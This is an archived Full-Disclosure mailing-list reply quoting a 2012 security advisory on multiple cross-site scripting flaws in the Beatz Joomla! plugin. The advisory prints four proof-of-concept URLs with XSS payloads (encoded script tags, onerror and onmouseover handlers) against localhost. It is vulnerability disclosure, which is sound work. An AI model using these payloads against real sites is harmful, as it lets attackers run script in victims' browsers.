[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Joomla! Plugin - Beatz 1.x <= Multiple Cross Site Scripting Vulnerabilities

To: YGN Ethical Hacker Group <lists@xxxxxxxx>
Subject: Re: [Full-disclosure] Joomla! Plugin - Beatz 1.x <= Multiple Cross Site Scripting Vulnerabilities
From: David3 Gonnella <netevil@xxxxxxxxxx>
Date: Mon, 16 Apr 2012 10:39:22 +0200

poc on localhost is a bit unreachable...  fbvfdjkh3ruifwqebdf



On 04/15/12 18:39, YGN Ethical Hacker Group wrote:
> 1. OVERVIEW
> 
> Beatz 1.x versions are vulnerable to Cross Site Scripting.
> 
> 
> 2. BACKGROUND
> 
> Beatz is a set of powerful Social Networking Script Joomla! 1.5
> plugins that allows you to start your own favourite artist band
> website. Although it is just a Joomla! plugin, it comes with full
> Joolma! bundle for ease of use and installation.
> 
> 
> 3. VULNERABILITY DESCRIPTION
> 
> Multiple parameters were not properly sanitized upon submission, which
> allows attacker to conduct Cross Site Scripting attack. This may allow
> an attacker to create a specially crafted URL that would execute
> arbitrary script code in a victim's browser. The vulnerable plugins
> include: com_find, com_charts and com_videos.
> 
> 
> 4. VERSIONS AFFECTED
> 
> Tested in 1.x versions
> 
> 
> 5. PROOF-OF-CONCEPT/EXPLOIT
> 
> == Generic Joomla! 1.5 Double Encoding XSS
> 
> http://localhost/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1
> 
> == com_charts (parameter: do)
> 
> http://localhost/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts
> 
> == com_find (parameter: keyword)
> 
> http://localhost/beatz/index.php?do=listAll&keyword=++Search";><img+src=0+onerror=prompt(/XSS/)>&option=com_find
> 
> == com_videos (parameter: video_keyword)
> 
> http://localhost/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search
> 
> 
> 6. SOLUTION
> 
> The vendor hasn't released the fixed yet.
> 
> 
> 7. VENDOR
> 
> Cogzidel Technologies Pvt Ltd.
> http://www.cogzidel.com/
> 
> 
> 8. CREDIT
> 
> Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
> 
> 
> 9. DISCLOSURE TIME-LINE
> 
> 2011-03-01: notified vendor
> 2012-04-15: vulnerability disclosed
> 
> 
> 10. REFERENCES
> 
> Original Advisory URL: 
> http://yehg.net/lab/pr0js/advisories/%5Bbeatz_1.x%5D_xss
> 
> #yehg [2012-04-15]
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Attachment: 0xB95E8B49.asc
Description: application/pgp-keys

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] Joomla! Plugin - Beatz 1.x <= Multiple Cross Site Scripting Vulnerabilities
  - From: YGN Ethical Hacker Group

Prev by Date: [Full-disclosure] [ MDVSA-2012:059 ] python-sqlalchemy
Next by Date: Re: [Full-disclosure] PHP Gift Registry 1.5.5 SQL Injection
Previous by thread: [Full-disclosure] Joomla! Plugin - Beatz 1.x <= Multiple Cross Site Scripting Vulnerabilities
Next by thread: [Full-disclosure] [SECURITY] [DSA 2452-1] apache2 security update
Index(es):
- Date
- Thread